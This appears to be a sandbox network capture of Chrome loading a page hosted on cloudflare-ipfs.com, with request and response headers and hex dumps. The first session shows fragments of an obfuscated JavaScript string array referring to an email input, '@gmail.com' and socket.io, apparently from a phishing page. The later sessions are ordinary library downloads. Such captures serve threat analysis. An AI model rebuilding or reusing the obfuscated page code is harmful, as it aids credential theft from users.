2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 78 32 30 5c 78 32 30 2e 73 69 27 2c 0a 20 20 20 20 20 20 20 20 27 6f 6e 74 65 6e 74 2f 69 6d 61 27 2c 0a 20 20 20 20 20 20 20 20 27 62 73 6f 6c 75 74 65 3b 5c 78 30 61 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 5c 78 32 30 33 35 70 78 5c 78 32 30 34 30 70 78 27 2c 0a 20 20 20 20 20 20 20 20 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6c 27 2c 0a 20 20 20 20 20 20 20 20 27 51 58 4f 38 4f 33 30 55 68 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 32 33 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 52 6e 6a 71 4b 77 6c 70 42 69 27 2c 0a 20 20 20 20 20 20 20 20 27 7a 37 67 4a 33 4a 65 4a 6a 5a 27 2c 0a 20 20 20 20 20 20 20 20 27 3b 5c 78 32 32 3e Data Ascii: x20\x20.si', 'ontent/ima', 'bsolute;\x0a\x20', '\x2035px\x2040px', '\x20\x20\x20\x20\x20\x20\x20\x20\x20l', 'QXO8O30Uho', '230px;\x0a\x20\x20\x20', 'RnjqKwlpBi', 'z7gJ3JeJjZ', ';\x22>
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 20 27 43 61 76 53 61 27 2c 0a 20 20 20 20 20 20 20 20 27 62 28 32 35 35 2c 5c 78 32 30 32 35 35 27 2c 0a 20 20 20 20 20 20 20 20 27 67 55 46 6b 65 64 67 34 46 51 27 2c 0a 20 20 20 20 20 20 20 20 27 43 53 51 41 4d 6b 6e 67 66 47 27 2c 0a 20 20 20 20 20 20 20 20 27 6f 6c 79 6c 69 6e 65 5c 78 32 30 7b 5c 78 30 61 27 2c 0a 20 20 20 20 20 20 20 20 27 50 44 66 2f 4e 6f 4e 70 2f 4e 27 2c 0a 20 20 20 20 20 20 20 20 27 36 68 6f 6e 44 37 47 58 49 6a 27 2c 0a 20 20 20 20 20 20 20 20 27 73 62 47 7a 6d 36 65 33 64 33 27 2c 0a 20 20 20 20 20 20 20 20 27 65 3d 5c 78 32 32 62 61 63 6b 67 72 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 4b 6c 76 2b 6f 34 33 73 61 57 27 2c 0a 20 20 20 20 20 20 20 20 27 50 52 46 30 50 32 4e 4d 73 41 27 2c 0a 20 20 20 20 20 20 20 20 27 39 35 50 32 Data Ascii: 'CavSa', 'b(255,\x20255', 'gUFkedg4FQ', 'CSQAMkngfG', 'olyline\x20{\x0a', 'PDf/NoNp/N', '6honD7GXIj', 'sbGzm6e3d3', 'e=\x22backgro', 'Klv+o43saW', 'PRF0P2NMsA', '95P2
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 78 27 2c 0a 20 20 20 20 20 20 20 20 27 30 29 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 27 2c 0a 20 20 20 20 20 20 20 20 27 69 6e 3a 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 27 2c 0a 20 20 20 20 20 20 20 20 27 46 44 2f 4e 41 38 70 6d 67 50 27 2c 0a 20 20 20 20 20 20 20 20 27 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 2b 65 44 66 7a 34 47 65 61 33 27 2c 0a 20 20 20 20 20 20 20 20 27 54 6c 46 74 56 65 55 34 63 53 27 2c 0a 20 20 20 20 20 20 20 20 27 7a 65 43 75 72 27 2c 0a 20 20 20 20 20 20 20 20 27 65 2b 44 4a 2f 44 72 32 51 63 27 2c 0a 20 20 20 20 20 20 20 20 27 58 56 5a 6a 77 77 35 72 58 36 27 2c 0a 20 20 20 20 20 20 20 20 27 2f 75 59 6e 35 4f 41 6f 50 4f Data Ascii: x', '0);\x0a\x20\x20\x20\x20}\x0a', 'in:\x20auto;\x0a', 'FD/NA8pmgP', 'auto;\x0a\x20\x20\x20\x20', '+eDfz4Gea3', 'TlFtVeU4cS', 'zeCur', 'e+DJ/Dr2Qc', 'XVZjww5rX6', '/uYn5OAoPO
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 27 7a 6c 4f 39 78 67 63 78 79 50 27 2c 0a 20 20 20 20 20 20 20 20 27 48 56 4f 6a 50 4b 34 4a 35 36 27 2c 0a 20 20 20 20 20 20 20 20 27 72 56 75 41 64 36 77 65 44 75 27 2c 0a 20 20 20 20 20 20 20 20 27 6b 4e 50 50 32 73 5a 41 45 46 27 2c 0a 20 20 20 20 20 20 20 20 27 53 38 57 62 41 79 49 70 51 42 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6c 61 73 73 3d 5c 78 32 32 64 6f 63 27 2c 0a 20 20 20 20 20 20 20 20 27 62 78 65 58 37 39 36 39 2b 2b 27 2c 0a 20 20 20 20 20 20 20 20 27 39 6b 59 4f 4a 79 53 73 54 42 27 2c 0a 20 20 20 20 20 20 20 20 27 74 69 6f 6e 3a 5c 78 32 30 72 65 6c 61 27 2c 0a 20 20 20 20 20 20 20 20 27 64 65 42 61 72 42 6f 74 74 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 74 4b 59 6f 76 55 65 65 6c 48 27 2c 0a 20 20 20 20 20 20 20 20 27 77 69 64 74 68 3a Data Ascii: 'zlO9xgcxyP', 'HVOjPK4J56', 'rVuAd6weDu', 'kNPP2sZAEF', 'S8WbAyIpQB', 'class=\x22doc', 'bxeX7969++', '9kYOJySsTB', 'tion:\x20rela', 'deBarBotto', 'tKYovUeelH', 'width:
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 20 20 20 20 27 51 30 33 6b 73 74 6b 78 39 4d 27 2c 0a 20 20 20 20 20 20 20 20 27 76 33 68 70 4d 53 4c 55 6e 50 27 2c 0a 20 20 20 20 20 20 20 20 27 69 51 39 2b 5a 45 71 56 68 75 27 2c 0a 20 20 20 20 20 20 20 20 27 65 3a 5c 78 32 30 30 2e 38 72 65 6d 3b 27 2c 0a 20 20 20 20 20 20 20 20 27 66 38 4b 58 78 4a 35 55 4f 75 27 2c 0a 20 20 20 20 20 20 20 20 27 51 74 50 30 6c 59 69 6d 37 34 27 2c 0a 20 20 20 20 20 20 20 20 27 2b 2b 63 76 57 77 35 54 6e 44 27 2c 0a 20 20 20 20 20 20 20 20 27 3a 5c 78 32 30 31 30 30 25 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 4d 51 33 64 34 7a 2f 41 44 66 27 2c 0a 20 20 20 20 20 20 20 20 27 2b 46 74 76 67 65 74 4e 73 4e 27 2c 0a 20 20 20 20 20 20 20 20 27 56 31 69 51 6d 63 36 61 79 53 27 2c 0a 20 20 Data Ascii: 'Q03kstkx9M', 'v3hpMSLUnP', 'iQ9+ZEqVhu', 'e:\x200.8rem;', 'f8KXxJ5UOu', 'QtP0lYim74', '++cvWw5TnD', ':\x20100%;\x0a\x20\x20', 'MQ3d4z/ADf', '+FtvgetNsN', 'V1iQmc6ayS',
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 20 20 27 30 74 4c 51 41 41 41 43 4d 6a 27 2c 0a 20 20 20 20 20 20 20 20 27 61 6c 69 67 6e 2d 69 74 65 6d 27 2c 0a 20 20 20 20 20 20 20 20 27 57 74 59 78 65 77 6a 35 43 59 27 2c 0a 20 20 20 20 20 20 20 20 27 42 6b 6f 71 78 45 38 62 51 4f 27 2c 0a 20 20 20 20 20 20 20 20 27 46 33 49 58 49 61 55 74 7a 44 27 2c 0a 20 20 20 20 20 20 20 20 27 2e 69 6f 2e 6d 69 6e 2e 6a 73 27 2c 0a 20 20 20 20 20 20 20 20 27 6c 47 79 72 59 53 53 48 73 50 27 2c 0a 20 20 20 20 20 20 20 20 27 4a 6c 74 75 70 48 64 4a 77 51 27 2c 0a 20 20 20 20 20 20 20 20 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 40 6b 65 79 66 72 27 2c 0a 20 20 20 20 20 20 20 20 27 2b 64 65 6c 4d 77 6e 51 41 7a 27 2c 0a 20 20 20 20 20 20 20 20 27 76 49 74 76 5a 27 2c 0a 20 20 20 20 20 20 20 20 27 34 6a 41 Data Ascii: '0tLQAAACMj', 'align-item', 'WtYxewj5CY', 'BkoqxE8bQO', 'F3IXIaUtzD', '.io.min.js', 'lGyrYSSHsP', 'JltupHdJwQ', '\x20\x20\x20\x20@keyfr', '+delMwnQAz', 'vItvZ', '4jA
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 27 64 76 4a 46 47 4d 56 4b 77 6d 27 2c 0a 20 20 20 20 20 20 20 20 27 54 76 52 74 48 4f 35 37 32 67 27 2c 0a 20 20 20 20 20 20 20 20 27 6e 2d 74 6f 70 3a 5c 78 32 30 33 70 78 27 2c 0a 20 20 20 20 20 20 20 20 27 40 67 6d 61 69 6c 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 27 6f 65 5c 78 32 30 55 49 5c 78 32 32 2c 5c 78 32 30 5c 78 32 32 48 27 2c 0a 20 20 20 20 20 20 20 20 27 79 66 30 6a 48 71 4c 33 47 35 27 2c 0a 20 20 20 20 20 20 20 20 27 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 3e 27 2c 0a 20 20 20 20 20 20 20 20 27 59 45 6e 76 44 41 78 6b 35 34 27 2c 0a 20 20 20 20 20 20 20 20 27 76 48 49 32 4e 49 4d 65 50 6e 27 2c 0a 20 20 20 20 20 20 20 20 27 72 2c 5c 78 30 61 5c 78 32 30 5c 78 Data Ascii: 'dvJFGMVKwm', 'TvRtHO572g', 'n-top:\x203px', '@gmail.com', 'oe\x20UI\x22,\x20\x22H', 'yf0jHqL3G5', '\x20\x20\x20\x20\x20\x20\x20<a>', 'YEnvDAxk54', 'vHI2NIMePn', 'r,\x0a\x20\x
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 27 6c 69 64 27 2c 0a 20 20 20 20 20 20 20 20 27 37 56 39 61 64 57 43 6a 55 61 27 2c 0a 20 20 20 20 20 20 20 20 27 6d 42 75 74 74 6f 6e 5c 78 32 32 5c 78 32 30 74 27 2c 0a 20 20 20 20 20 20 20 20 27 2e 65 6d 61 69 6c 49 6e 70 75 27 2c 0a 20 20 20 20 20 20 20 20 27 5c 78 32 30 3d 3d 3d 3d 3d 3d 3d 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 27 4a 69 73 34 43 61 35 38 5a 42 27 2c 0a 20 20 20 20 20 20 20 20 27 53 5a 35 49 79 54 69 4c 43 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 61 72 72 6f 77 73 2d 72 6f 74 27 2c 0a 20 20 20 20 20 20 20 20 27 49 68 43 30 69 66 49 4f 4d 2b 27 2c 0a 20 20 20 20 20 20 20 20 27 3a 5c 78 32 30 31 30 70 78 3b 5c 78 32 30 66 6f 27 2c 0a 20 20 20 20 20 20 20 20 27 3e 61 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 Data Ascii: 'lid', '7V9adWCjUa', 'mButton\x22\x20t', '.emailInpu', '\x20=========', 'Jis4Ca58ZB', 'SZ5IyTiLCo', 'arrows-rot', 'IhC0ifIOM+', ':\x2010px;\x20fo', '>a\x20{\x0a\x20\x20\x20\x2
2024-04-16 09:43:59 UTC	1369	IN	Data Raw: 2c 0a 20 20 20 20 20 20 20 20 27 34 64 67 48 2f 63 45 47 5a 4b 27 2c 0a 20 20 20 20 20 20 20 20 27 74 68 4a 74 35 56 69 4a 67 67 27 2c 0a 20 20 20 20 20 20 20 20 27 32 49 34 44 47 6d 57 4a 37 68 27 2c 0a 20 20 20 20 20 20 20 20 27 3a 5c 78 32 30 38 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 27 2c 0a 20 20 20 20 20 20 20 20 27 62 67 71 33 48 69 47 35 48 35 27 2c 0a 20 20 20 20 20 20 20 20 27 46 4a 37 7a 32 4f 48 52 46 31 27 2c 0a 20 20 20 20 20 20 20 20 27 6d 58 6c 35 65 45 68 49 52 37 27 2c 0a 20 20 20 20 20 20 20 20 27 5f 62 74 6e 5f 63 6c 61 73 73 27 2c 0a 20 20 20 20 20 20 20 20 27 4c 62 5a 50 74 63 6e 61 4d 2b 27 2c 0a 20 20 20 20 20 20 20 20 27 4d 4c 4b 70 4e 66 4b 72 72 46 27 2c 0a 20 20 20 20 20 20 20 20 27 63 67 38 2b 30 52 74 55 37 6a 27 2c Data Ascii: , '4dgH/cEGZK', 'thJt5ViJgg', '2I4DGmWJ7h', ':\x2080px;\x0a\x20\x20', 'bgq3HiG5H5', 'FJ7z2OHRF1', 'mXl5eEhIR7', '_btn_class', 'LbZPtcnaM+', 'MLKpNfKrrF', 'cg8+0RtU7j',

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49704	3.162.103.56	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:43:59 UTC	572	OUT	GET /4.6.0/socket.io.min.js HTTP/1.1 Host: cdn.socket.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://cloudflare-ipfs.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:43:59 UTC	702	IN	HTTP/1.1 200 OK Content-Type: application/javascript; charset=utf-8 Content-Length: 45806 Connection: close Accept-Ranges: bytes Access-Control-Allow-Origin: * Cache-Control: public, max-age=31536000, immutable Content-Disposition: inline; filename="socket.io.min.js" Date: Tue, 05 Mar 2024 06:17:31 GMT ETag: "80f5b8c6a9eeac15de93e5a112036a06" Server: Vercel Strict-Transport-Security: max-age=63072000 X-Vercel-Cache: HIT X-Vercel-Id: iad1::fl8q7-1709619451170-26a25644c969 X-Cache: Hit from cloudfront Via: 1.1 e4938fc434947f57a79af6b9b403df6e.cloudfront.net (CloudFront) X-Amz-Cf-Pop: IAD61-P1 X-Amz-Cf-Id: 5ekxahgJRCxLWK8M2nw7evqy-XqpDg_MBFdKdins3E9gZLpigyHfFQ== Age: 3641188
2024-04-16 09:43:59 UTC	16384	IN	Data Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 36 2e 30 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 33 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 65 29 3a 28 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 Data Ascii: /! Socket.IO v4.6.0 * (c) 2014-2023 Guillermo Rauch * Released under the MIT License. */!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof g
2024-04-16 09:43:59 UTC	16384	IN	Data Raw: 6c 65 3d 21 31 3b 66 6f 72 28 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 2c 69 3d 6e 3d 3d 3d 74 2e 6c 65 6e 67 74 68 2d 31 3b 45 28 72 2c 65 2e 73 75 70 70 6f 72 74 73 42 69 6e 61 72 79 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 65 2e 77 73 2e 73 65 6e 64 28 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 69 26 26 69 74 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 77 72 69 74 61 62 6c 65 3d 21 30 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 64 72 61 69 6e 22 29 7d 29 2c 65 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 29 7d 29 29 7d 2c 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 6e 28 72 29 7d 7d 2c 7b 6b 65 79 3a 22 64 6f 43 6c 6f 73 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f Data Ascii: le=!1;for(var n=function(n){var r=t[n],i=n===t.length-1;E(r,e.supportsBinary,(function(t){try{e.ws.send(t)}catch(t){}i&&it((function(){e.writable=!0,e.emitReserved("drain")}),e.setTimeoutFn)}))},r=0;r<t.length;r++)n(r)}},{key:"doClose",value:function(){vo
2024-04-16 09:43:59 UTC	13038	IN	Data Raw: 73 68 69 66 74 28 74 29 2c 74 68 69 73 2e 5f 6f 70 74 73 2e 72 65 74 72 69 65 73 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 66 72 6f 6d 51 75 65 75 65 26 26 21 74 68 69 73 2e 66 6c 61 67 73 2e 76 6f 6c 61 74 69 6c 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 61 64 64 54 6f 51 75 65 75 65 28 6e 29 2c 74 68 69 73 3b 76 61 72 20 69 3d 7b 74 79 70 65 3a 45 74 2e 45 56 45 4e 54 2c 64 61 74 61 3a 6e 2c 6f 70 74 69 6f 6e 73 3a 7b 7d 7d 3b 69 66 28 69 2e 6f 70 74 69 6f 6e 73 2e 63 6f 6d 70 72 65 73 73 3d 21 31 21 3d 3d 74 68 69 73 2e 66 6c 61 67 73 2e 63 6f 6d 70 72 65 73 73 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6e 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b 76 61 72 20 6f 3d 74 68 69 73 2e 69 64 73 2b 2b 2c 73 3d 6e 2e 70 6f 70 28 29 3b 74 68 Data Ascii: shift(t),this._opts.retries&&!this.flags.fromQueue&&!this.flags.volatile)return this._addToQueue(n),this;var i={type:Et.EVENT,data:n,options:{}};if(i.options.compress=!1!==this.flags.compress,"function"==typeof n[n.length-1]){var o=this.ids++,s=n.pop();th

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49708	104.17.96.13	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	825	OUT	GET /favicon.ico HTTP/1.1 Host: cloudflare-ipfs.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ipfs/bafkreicj5ayv2h57oipuhhiwntcmkwqzboy3hs5k76fwswff4bq65ofqze Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: __cf_bm=s3ichK8dkqJvZNMs9dn1gFFNqF9_5M3Jc44bFurcULg-1713260639-1.0.1.1-8p6i8spHiCTCsdiMFuGlJcGUy.a20re65qf.8D3N9SpiolEvBDXTAYWFTKUTm9_bs0vBUDeEXvZknBej23D6LQ
2024-04-16 09:44:00 UTC	222	IN	HTTP/1.1 404 Not Found Date: Tue, 16 Apr 2024 09:44:00 GMT Content-Type: text/plain;charset=UTF-8 Content-Length: 14 Connection: close Server: cloudflare CF-RAY: 87533bfc988953c7-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 09:44:00 UTC	14	IN	Data Raw: 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: Page not found

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49709	104.17.24.14	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	576	OUT	GET /ajax/libs/font-awesome/6.1.1/css/all.min.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://cloudflare-ipfs.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	941	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:00 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"623a082a-4ef8" Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 23203 Expires: Sun, 06 Apr 2025 09:44:00 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4kXelXpTF2KZLgmFcLV%2Fvg5zMeoLKaFQPlG7W6mLOkufU4N5mt%2Fni5RLD8grzMduSO7fY8dyuYymCwx4GAlXIJydnAJsWIjonyomL1wngOetArjYCiSwqzPtswbkkb3P7wrGlxIy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 87533bfc8d1a6756-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 09:44:00 UTC	428	IN	Data Raw: 33 39 61 38 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 31 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65 Data Ascii: 39a8/! Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 65 6d 7d 2e 66 61 Data Ascii: t-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 Data Ascii: -margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animation-directi
2024-04-16 09:44:00 UTC	1369	IN	Data Raw: 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d Data Ascii: tion-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-
